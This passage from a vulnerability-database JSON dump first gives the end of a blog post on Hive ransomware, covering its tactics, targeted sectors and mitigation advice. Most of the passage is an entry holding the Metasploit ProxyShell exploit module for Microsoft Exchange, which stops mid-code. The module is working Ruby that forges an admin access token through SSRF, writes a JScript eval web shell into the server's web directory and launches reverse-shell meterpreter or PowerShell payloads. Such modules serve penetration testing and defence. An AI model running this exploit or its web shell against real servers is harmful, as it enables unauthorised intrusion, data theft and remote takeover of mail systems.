attack.\n\n### Who is this Threat Group?\n\nThe Hive gang is a Ransomware as a Service (RaaS) provider first identified in June 2021. Although relatively new, their aggressive tactics and ever evolving malware variants have made them one of the most successful RaaS groups of its kind.\n\nIt's claimed some big victims, for example [Tata Power just one month ago](<https://www.bleepingcomputer.com/news/security/hive-claims-ransomware-attack-on-tata-power-begins-leaking-data/>).\n\n### How are they targeting victims?\n\nPhishing emails are sent with malicious payloads (e.g. Cobalt Strike) to get VPN credentials, and then scan for vulnerable remote desktop servers for lateral movement.\n\n### What do they do once they're inside?\n\nIt's all about data exfiltration, with encryption of files on the network.\n\n### Why should I act now?\n\nCybersecurity experts largely believe Hive is allied with Conti. The Hive ransomware gang is just over a year old but has already allied with more traditional ransomware groups, promoting itself as one of the top three most active ransomware groups in July 2022.\n\nThe gang is more active and aggressive than ever, with the affiliates attacking between three to five organisations every day since the operation became known in late June 2021.\n\nOn 17th November 2022 the hacker group claimed responsibility of taking down a USA based health care provider. Hive appears to have demanded a ransom of $900,000. In exchange, the organisation would agree to delete all the data.\n\nTechRepublic amongst other outlets on the on 25th October 2022 named Hive Ransomware within the current top four most dangerous and destructive ransomware groups of 2022. Attacks from this gang alone jumped by 188% from February to March 2022, according to NCC\u2019s March Cyber Threat Pulse report. This ransomware variant was also one of the top four most observed in Q3 of 2022 it is expected to only get more prominent as more affiliates use RaaS with new vulnerabilities such as zero-day attacks to aid in initial intrusion.\n\nIn Q3 2022 Hive ransomware hit 15 countries, with the US and UK being the top targets, respectively.\n\nThe ransomware is super-fast, capable of encrypting 4GB of data per minute. Hive hires penetration testers, access brokers, and other threat actors who continue to develop the threat, techniques, and tactics.\n\nIn May 2022 the gang targeted Costa Rica when the country was reeling from a cyberattack by Conti. Only weeks after the Costa Rican president declared an emergency following that first ransomware attack Hive joined in and crippled the country\u2019s public health service, the Costa Rican Social Security Fund.\n\n### Has it really got more serious? Why should I be concerned?\n\nHive ransomware was last upgraded in July 2022, according to Microsoft Threat Intelligence Centre (MSTIC). Researchers noted that Hive migrated its malware code from GoLang to Rust last month. Rust offers memory, data type, thread safety, deep control over low-level resources, a user-friendly syntax, access to a variety of cryptographic libraries, and is relatively more difficult to reverse-engineer.\n\nThe July update also includes string encryption and more complicated encryption mechanisms that leverage Elliptic Curve Diffie-Hellmann (ECDH) with Curve25519 and XChaCha20-Poly1305 (authenticated encryption with ChaCha20 symmetric cipher). Instead of embedding an encrypted key in each file that it encrypts, it generates two sets of keys in memory, uses them to encrypt files, and then encrypts and writes the sets to the root of the drive it encrypts, both with .key extension.\n\n### I run Linux so I'm OK, right?\n\nHive introduced Linux and FreeBSD encryption capabilities in October 2021. At the time ESET, who discovered these capabilities, clarified that the Linux variant of the ransomware was functionally inadequate compared to its Windows variant. 'Functionally inadequate' doesn't mean that Linux is safe though.\n\n### What have Hives core target industries looked like?\n\nThe industrials sector is still the most common target however hive have broadened their target victims to include energy, resources, agriculture, academic, educational, science institutions, car dealerships, financial, media, electronic distributers and healthcare. In November 2022 Q3, the Hive ransomware hit 15 countries, with the U.S. and the U.K. as the top two targets respectively.\n\n### What can be done to mitigate?\n\nBetter focus on preventing social engineering attacks, adopt defines-in-depth combination of policies, technical defences, and education for end users\u201d Human errors is currently responsible for 82% of data breaches according to Verizon\u2019s 2022 Data Breach Investigations Report.\n\nPatch patch patch! Monitor the CISA\u2019s Known Exploited Vulnerability Catalogue to identify weaknesses.\n\nHive is famously seeking targets using vulnerable Exchange Servers, with some of the critical vulnerabilities and inclusive patch information detailed below:\n\n * [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>) - Microsoft Exchange Server Security Feature Bypass Vulnerability\n * [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) - Microsoft Exchange Server Remote Code Execution Vulnerability\n * [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>) - Microsoft Exchange Server Privilege Escalation Vulnerability\n\nImplement, develop phishing-resistant multi-factor authentication (MFA) technique.\n\nWhere SIEM or ELK Stack solutions are in force, develop the decoders and rules.\n\n### Hive is in my organisation, what happens now and what should I do?\n\nI strongly encourage organisations to start action now to mitigate and reduce the risk and impact of ransomware incidents. Below are areas to focus on when looking at your SIEM, EDR and monitoring solutions.\n\nOnce in your estate Hive ransomware will immediately start working on evasion detection, by executing processes. This is how you deal with it.\n\n**Hive behaviour:** Identify processes related to backups, antivirus/anti-spyware, and file copying and then terminating those processes to facilitate file encryption. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Remove all existing shadow copies and stop the volume shadow copy services via vssadmin on command line or via PowerShell. \n**Advice:** NGAVs will typically pick up on this behaviour these days, however offsite backups should be adopted.\n\n**Hive behaviour:** Delete Windows event logs, specifically the System, Security and Application logs. \n**Advice:** Make sure you are forwarding logs to an external source that cannot be moved to laterally by the threat actors, ensure logs are also replicated elsewhere or offline storage/backup is utilised which can later be restored.\n\nAlso, implement data backups and encrypt data at rest, also practice your recovery procedures with regular drills.\n\nQuickly isolate any infected devices to prevent the ransomware from spreading further throughout your network. To do this, IT administrators must have up-to-date knowledge of all assets in the organisation and the tools to easily manage them, depending on how far the attack is in progress it may be prudent to shut down affected machines immediately, if backups are not available a provider may be able to perform data carving on offline-disks however this is a long-winded process so concentrate on you most critical data assets.\n\nIf your data has been stolen, take steps to protect your company and notify those who might be affected. It is recommended to report the attack right away to the authorities who may have knowledge of other attacks and can aid in an investigation by sharing knowledge.\n\nContact us if you need help.\n\nThe post [Hive Ransomware is on the rise. How should you deal with it?](<https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/>) first appeared on [Pen Test Partners](<https://www.pentestpartners.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-18T06:44:42", "type": "pentestpartners", "title": "Hive Ransomware is on the rise. How should you deal with it?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-11-18T06:44:42", "id": "PENTESTPARTNERS:77A7D085A837F9542DA633DA83F4A446", "href": "https://www.pentestpartners.com/security-blog/hive-ransomware-is-on-the-rise-how-should-you-deal-with-it/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-08-07T09:12:52", "description": "This Metasploit module exploits a vulnerability on Microsoft Exchange Server that allows an attacker to bypass the authentication, impersonate an arbitrary user, and write an arbitrary file to achieve remote code execution. By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server. This vulnerability affects Exchange 2013 CU23 versions before 15.0.1497.15, Exchange 2016 CU19 versions before 15.1.2176.12, Exchange 2016 CU20 versions before 15.1.2242.5, Exchange 2019 CU8 versions before 15.2.792.13, and Exchange 2019 CU9 versions before 15.2.858.9.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-21T00:00:00", "type": "zdt", "title": "Microsoft Exchange ProxyShell Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-21T00:00:00", "id": "1337DAY-ID-36667", "href": "https://0day.today/exploit/description/36667", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'winrm'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Exchange ProxyShell RCE',\n 'Description' => %q{\n This module exploit a vulnerability on Microsoft Exchange Server that\n allows an attacker to bypass the authentication (CVE-2021-31207), impersonate an\n arbitrary user (CVE-2021-34523) and write an arbitrary file (CVE-2021-34473) to achieve\n the RCE (Remote Code Execution).\n\n By taking advantage of this vulnerability, you can execute arbitrary\n commands on the remote Microsoft Exchange Server.\n\n This vulnerability affects Exchange 2013 CU23 < 15.0.1497.15,\n Exchange 2016 CU19 < 15.1.2176.12, Exchange 2016 CU20 < 15.1.2242.5,\n Exchange 2019 CU8 < 15.2.792.13, Exchange 2019 CU9 < 15.2.858.9.\n\n All components are vulnerable by default.\n },\n 'Author' => [\n 'Orange Tsai', # Discovery\n 'Jang (@testanull)', # Vulnerability analysis\n 'PeterJson', # Vulnerability analysis\n 'brandonshi123', # Vulnerability analysis\n 'mekhalleh (RAMELLA S\u00e9bastien)', # exchange_proxylogon_rce template\n 'Spencer McIntyre', # Metasploit module\n 'wvu' # Testing\n ],\n 'References' => [\n [ 'CVE', '2021-34473' ],\n [ 'CVE', '2021-34523' ],\n [ 'CVE', '2021-31207' ],\n [ 'URL', 'https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1' ],\n [ 'URL', 'https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf' ],\n [ 'URL', 'https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/' ]\n ],\n 'DisclosureDate' => '2021-04-06', # pwn2own 2021\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Platform' => ['windows'],\n 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Windows Powershell',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_powershell,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_X64, ARCH_X86],\n 'Type' => :windows_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'CMDSTAGER::FLAVOR' => 'psh_invokewebrequest'\n }\n }\n ],\n [\n 'Windows Command',\n {\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD],\n 'Type' => :windows_command,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\n 'AKA' => ['ProxyShell'],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n )\n )\n\n register_options([\n OptString.new('EMAIL', [true, 'A known email address for this organization']),\n OptBool.new('UseAlternatePath', [true, 'Use the IIS root dir as alternate path', false]),\n ])\n\n register_advanced_options([\n OptString.new('BackendServerName', [false, 'Force the name of the backend Exchange server targeted']),\n OptString.new('ExchangeBasePath', [true, 'The base path where exchange is installed', 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15']),\n OptString.new('ExchangeWritePath', [true, 'The path where you want to write the backdoor', 'owa\\\\auth']),\n OptString.new('IISBasePath', [true, 'The base path where IIS wwwroot directory is', 'C:\\\\inetpub\\\\wwwroot']),\n OptString.new('IISWritePath', [true, 'The path where you want to write the backdoor', 'aspnet_client']),\n OptString.new('MapiClientApp', [true, 'This is MAPI client version sent in the request', 'Outlook/15.0.4815.1002']),\n OptString.new('UserAgent', [true, 'The HTTP User-Agent sent in the request', 'Mozilla/5.0'])\n ])\n end\n\n def check\n @ssrf_email ||= Faker::Internet.email\n res = send_http('GET', '/mapi/nspi/')\n return CheckCode::Unknown if res.nil?\n return CheckCode::Safe unless res.code == 200 && res.get_html_document.xpath('//head/title').text == 'Exchange MAPI/HTTP Connectivity Endpoint'\n\n CheckCode::Vulnerable\n end\n\n def cmd_windows_generic?\n datastore['PAYLOAD'] == 'cmd/windows/generic'\n end\n\n def encode_cmd(cmd)\n cmd.gsub!('\\\\', '\\\\\\\\\\\\')\n cmd.gsub('\"', '\\u0022').gsub('&', '\\u0026').gsub('+', '\\u002b')\n end\n\n def random_mapi_id\n id = \"{#{Rex::Text.rand_text_hex(8)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(4)}\"\n id = \"#{id}-#{Rex::Text.rand_text_hex(12)}}\"\n id.upcase\n end\n\n def request_autodiscover(_server_name)\n xmlns = { 'xmlns' => 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a' }\n\n response = send_http(\n 'POST',\n '/autodiscover/autodiscover.xml',\n data: soap_autodiscover,\n ctype: 'text/xml; charset=utf-8'\n )\n\n case response.body\n when %r{<ErrorCode>500</ErrorCode>}\n fail_with(Failure::NotFound, 'No Autodiscover information was found')\n when %r{<Action>redirectAddr</Action>}\n fail_with(Failure::NotFound, 'No email address was found')\n end\n\n xml = Nokogiri::XML.parse(response.body)\n\n legacy_dn = xml.at_xpath('//xmlns:User/xmlns:LegacyDN', xmlns)&.content\n fail_with(Failure::NotFound, 'No \\'LegacyDN\\' was found') if legacy_dn.nil? || legacy_dn.empty?\n\n server = ''\n xml.xpath('//xmlns:Account/xmlns:Protocol', xmlns).each do |item|\n type = item.at_xpath('./xmlns:Type', xmlns)&.content\n if type == 'EXCH'\n server = item.at_xpath('./xmlns:Server', xmlns)&.content\n end\n end\n fail_with(Failure::NotFound, 'No \\'Server ID\\' was found') if server.nil? || server.empty?\n\n { server: server, legacy_dn: legacy_dn }\n end\n\n def request_fqdn\n ntlm_ssp = \"NTLMSSP\\x00\\x01\\x00\\x00\\x00\\x05\\x02\\x88\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n received = send_request_raw(\n 'method' => 'RPC_IN_DATA',\n 'uri' => normalize_uri('rpc', 'rpcproxy.dll'),\n 'headers' => {\n 'Authorization' => \"NTLM #{Rex::Text.encode_base64(ntlm_ssp)}\"\n }\n )\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n if received.code == 401 && received['WWW-Authenticate'] && received['WWW-Authenticate'].match(/^NTLM/i)\n hash = received['WWW-Authenticate'].split('NTLM ')[1]\n message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))\n dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]\n\n return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase\n end\n\n fail_with(Failure::NotFound, 'No Backend server was found')\n end\n\n # https://docs.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oxcmapihttp/c245390b-b115-46f8-bc71-03dce4a34bff\n def request_mapi(_server_name, legacy_dn)\n data = \"#{legacy_dn}\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\"\n headers = {\n 'X-RequestType' => 'Connect',\n 'X-ClientInfo' => random_mapi_id,\n 'X-ClientApplication' => datastore['MapiClientApp'],\n 'X-RequestId' => \"#{random_mapi_id}:#{Rex::Text.rand_text_numeric(5)}\"\n }\n\n sid = ''\n response = send_http(\n 'POST',\n '/mapi/emsmdb',\n data: data,\n ctype: 'application/mapi-http',\n headers: headers\n )\n if response&.code == 200\n sid = response.body.match(/S-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*-[0-9]*/).to_s\n end\n fail_with(Failure::NotFound, 'No \\'SID\\' was found') if sid.empty?\n\n sid\n end\n\n # pre-authentication SSRF (Server Side Request Forgery) + impersonate as admin.\n def run_cve_2021_34473\n if datastore['BackendServerName'] && !datastore['BackendServerName'].empty?\n server_name = datastore['BackendServerName']\n print_status(\"Internal server name forced to: #{server_name}\")\n else\n print_status('Retrieving backend FQDN over RPC request')\n server_name = request_fqdn\n print_status(\"Internal server name: #{server_name}\")\n end\n @backend_server_name = server_name\n\n # get information via an autodiscover request.\n print_status('Sending autodiscover request')\n autodiscover = request_autodiscover(server_name)\n\n print_status(\"Server: #{autodiscover[:server]}\")\n print_status(\"LegacyDN: #{autodiscover[:legacy_dn]}\")\n\n # get the user UID using mapi request.\n print_status('Sending mapi request')\n mailbox_user_sid = request_mapi(server_name, autodiscover[:legacy_dn])\n print_status(\"SID: #{mailbox_user_sid} (#{datastore['EMAIL']})\")\n\n send_payload(mailbox_user_sid)\n @common_access_token = build_token(mailbox_user_sid)\n end\n\n def send_http(method, uri, opts = {})\n ssrf = \"Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n unless opts[:cookie] == :none\n opts[:cookie] = \"Email=#{ssrf}\"\n end\n\n request = {\n 'method' => method,\n 'uri' => \"/#{ssrf}#{uri}\",\n 'agent' => datastore['UserAgent'],\n 'ctype' => opts[:ctype],\n 'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }\n }\n request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?\n request = request.merge({ 'cookie' => opts[:cookie] }) unless opts[:cookie].nil?\n request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?\n\n received = send_request_cgi(request)\n fail_with(Failure::TimeoutExpired, 'Server did not respond in an expected way') unless received\n\n received\n end\n\n def send_payload(user_sid)\n @shell_input_name = rand_text_alphanumeric(8..12)\n @draft_subject = rand_text_alphanumeric(8..12)\n payload = Rex::Text.encode_base64(PstEncoding.encode(\"#<script language=\\\"JScript\\\" runat=\\\"server\\\">function Page_Load(){eval(Request[\\\"#{@shell_input_name}\\\"],\\\"unsafe\\\");}</script>\"))\n file_name = \"#{Faker::Lorem.word}#{%w[- _].sample}#{Faker::Lorem.word}.#{%w[rtf pdf docx xlsx pptx zip].sample}\"\n envelope = XMLTemplate.render('soap_draft', user_sid: user_sid, file_content: payload, file_name: file_name, subject: @draft_subject)\n\n send_http('POST', '/ews/exchange.asmx', data: envelope, ctype: 'text/xml;charset=UTF-8')\n end\n\n def soap_autodiscover\n <<~SOAP\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\">\n <Request>\n <EMailAddress>#{datastore['EMAIL'].encode(xml: :text)}</EMailAddress>\n <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>\n </Request>\n </Autodiscover>\n SOAP\n end\n\n def web_directory\n if datastore['UseAlternatePath']\n datastore['IISWritePath'].gsub('\\\\', '/')\n else\n datastore['ExchangeWritePath'].gsub('\\\\', '/')\n end\n end\n\n def build_token(sid)\n uint8_tlv = proc do |type, value|\n type + [value.length].pack('C') + value\n end\n\n token = uint8_tlv.call('V', \"\\x00\")\n token << uint8_tlv.call('T', 'Windows')\n token << \"\\x43\\x00\"\n token << uint8_tlv.call('A', 'Kerberos')\n token << uint8_tlv.call('L', datastore['EMAIL'])\n token << uint8_tlv.call('U', sid)\n\n # group data for S-1-5-32-544\n token << \"\\x47\\x01\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x0c\\x53\\x2d\\x31\\x2d\\x35\\x2d\\x33\\x32\\x2d\\x35\\x34\\x34\\x45\\x00\\x00\\x00\\x00\"\n Rex::Text.encode_base64(token)\n end\n\n def execute_powershell(cmdlet, args: [])\n winrm = SSRFWinRMConnection.new({\n endpoint: full_uri('PowerShell/'),\n transport: :ssrf,\n ssrf_proc: proc do |method, uri, opts|\n uri = \"#{uri}?X-Rps-CAT=#{@common_access_token}\"\n uri << \"&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\"\n opts[:cookie] = :none\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},\n \"<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>\"\n )\n opts[:data].gsub!(\n %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand=\"true\">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},\n \"<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>\"\n )\n send_http(method, uri, opts)\n end\n })\n\n winrm.shell(:powershell) do |shell|\n shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)\n shell.extend(SSRFWinRMConnection::PowerShell)\n shell.run({ cmdlet: cmdlet, args: args })\n end\n end\n\n def exploit\n @ssrf_email ||= Faker::Internet.email\n print_status('Attempt to exploit for CVE-2021-34473')\n run_cve_2021_34473\n\n powershell_probe = send_http('GET', \"/PowerShell/?X-Rps-CAT=#{@common_access_token}&Email=Autodiscover/autodiscover.json?a=#{@ssrf_email}\", cookie: :none)\n fail_with(Failure::UnexpectedReply, 'Failed to access the PowerShell backend') unless powershell_probe&.code == 200\n\n print_status('Assigning the \\'Mailbox Import Export\\' role')\n execute_powershell('New-ManagementRoleAssignment', args: [ { name: '-Role', value: 'Mailbox Import Export' }, { name: '-User', value: datastore['EMAIL'] } ])\n\n @shell_filename = \"#{rand_text_alphanumeric(8..12)}.aspx\"\n if datastore['UseAlternatePath']\n unc_path = \"#{datastore['IISBasePath'].split(':')[1]}\\\\#{datastore['IISWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['IISBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n else\n unc_path = \"#{datastore['ExchangeBasePath'].split(':')[1]}\\\\FrontEnd\\\\HttpProxy\\\\#{datastore['ExchangeWritePath']}\"\n unc_path = \"\\\\\\\\\\\\\\\\#{@backend_server_name}\\\\#{datastore['ExchangeBasePath'].split(':')[0]}$#{unc_path}\\\\#{@shell_filename}\"\n end\n\n normal_path = unc_path.gsub(/^\\\\+127\\.0\\.0\\.1\\\\(.)\\$\\\\/, '\\1:\\\\')\n print_status(\"Writing to: #{normal_path}\")\n register_file_for_cleanup(normal_path)\n\n @export_name = rand_text_alphanumeric(8..12)\n execute_powershell('New-MailboxExportRequest', args: [\n { name: '-Name', value: @export_name },\n { name: '-Mailbox', value: datastore['EMAIL'] },\n { name: '-IncludeFolders', value: '#Drafts#' },\n { name: '-ContentFilter', value: \"(Subject -eq '#{@draft_subject}')\" },\n { name: '-ExcludeDumpster' },\n { name: '-FilePath', value: unc_path }\n ])\n\n print_status('Waiting for the export request to complete...')\n 30.times do\n if execute_command('whoami')&.code == 200\n print_good('The mailbox export request has completed')\n break\n end\n sleep 5\n end\n\n print_status('Triggering the payload')\n case target['Type']\n when :windows_command\n vprint_status(\"Generated payload: #{payload.encoded}\")\n\n if !cmd_windows_generic?\n execute_command(payload.encoded)\n else\n boundary = rand_text_alphanumeric(8..12)\n response = execute_command(\"cmd /c echo START#{boundary}&#{payload.encoded}&echo END#{boundary}\")\n\n print_warning('Dumping command output in response')\n if response.body =~ /START#{boundary}(.*)END#{boundary}/m\n print_line(Regexp.last_match(1).strip)\n else\n print_error('Empty response, no command output')\n end\n end\n when :windows_dropper\n execute_command(generate_cmdstager(concat_operator: ';').join)\n when :windows_powershell\n cmd = cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true)\n execute_command(cmd)\n end\n end\n\n def cleanup\n super\n return unless @common_access_token && @export_name\n\n print_status('Removing the mailbox export request')\n execute_powershell('Remove-MailboxExportRequest', args: [\n { name: '-Identity', value: \"#{datastore['EMAIL']}\\\\#{@export_name}\" },\n { name: '-Confirm', value: false }\n ])\n end\n\n def execute_command(cmd, _opts = {})\n if !cmd_windows_generic?\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\"));\"\n else\n cmd = \"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").Exec(\\\"#{encode_cmd(cmd)}\\\").StdOut.ReadAll());\"\n end\n\n send_request_raw(\n 'method' => 'POST',\n 'uri' => normalize_uri(web_directory, @shell_filename),\n 'ctype' => 'application/x-www-form-urlencoded',\n 'data' => \"#{@shell_input_name}=#{cmd}\"\n )\n end\nend\n\nclass PstEncoding\n ENCODE_TABLE = [\n 71, 241, 180, 230, 11, 106, 114, 72,\n 133, 78, 158, 235, 226, 248, 148, 83,\n 224, 187, 160, 2, 232, 90, 9, 171,\n 219, 227, 186, 198, 124, 195, 16, 221,\n 57, 5, 150, 48, 245, 55, 96, 130,\n 140, 201, 19, 74, 107, 29, 243, 251,\n 143, 38, 151, 202, 145, 23, 1, 196,\n 50, 45, 110, 49, 149, 255, 217, 35,\n 209, 0, 94, 121, 220, 68, 59, 26,\n 40, 197, 97, 87, 32, 144, 61, 131,\n 185, 67, 190, 103, 210, 70, 66, 118,\n 192, 109, 91, 126, 178, 15, 22, 41,\n 60, 169, 3, 84, 13, 218, 93, 223,\n 246, 183, 199, 98, 205, 141, 6, 211,\n 105, 92, 134, 214, 20, 247, 165, 102,\n 117, 172, 177, 233, 69, 33, 112, 12,\n 135, 159, 116, 164, 34, 76, 111, 191,\n 31, 86, 170, 46, 179, 120, 51, 80,\n 176, 163, 146, 188, 207, 25, 28, 167,\n 99, 203, 30, 77, 62, 75, 27, 155,\n 79, 231, 240, 238, 173, 58, 181, 89,\n 4, 234, 64, 85, 37, 81, 229, 122,\n 137, 56, 104, 82, 123, 252, 39, 174,\n 215, 189, 250, 7, 244, 204, 142, 95,\n 239, 53, 156, 132, 43, 21, 213, 119,\n 52, 73, 182, 18, 10, 127, 113, 136,\n 253, 157, 24, 65, 125, 147, 216, 88,\n 44, 206, 254, 36, 175, 222, 184, 54,\n 200, 161, 128, 166, 153, 152, 168, 47,\n 14, 129, 101, 115, 228, 194, 162, 138,\n 212, 225, 17, 208, 8, 139, 42, 242,\n 237, 154, 100, 63, 193, 108, 249, 236\n ].freeze\n\n def self.encode(data)\n encoded = ''\n data.each_char do |char|\n encoded << ENCODE_TABLE[char.ord].chr\n end\n encoded\n end\nend\n\nclass XMLTemplate\n def self.render(template_name, context = nil)\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxyshell', \"#{template_name}.xml.erb\")\n template = ::File.binread(file_path)\n case context\n when Hash\n b = binding\n locals = context.collect { |k, _| \"#{k} = context[#{k.inspect}]; \" }\n b.eval(locals.join)\n else\n raise ArgumentError\n end\n b.eval(Erubi::Engine.new(template).src)\n end\nend\n\nclass SSRFWinRMConnection < WinRM::Connection\n class MessageFactory < WinRM::PSRP::MessageFactory\n def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)\n WinRM::PSRP::Message.new(\n runspace_pool_id,\n WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],\n XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),\n pipeline_id\n )\n end\n end\n\n # we have to define this class so we can define our own transport factory that provides one backed by the SSRF\n # vulnerability\n class TransportFactory < WinRM::HTTP::TransportFactory\n class HttpSsrf < WinRM::HTTP::HttpTransport\n # rubocop:disable Lint/\n def initialize(endpoint, options)\n @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : 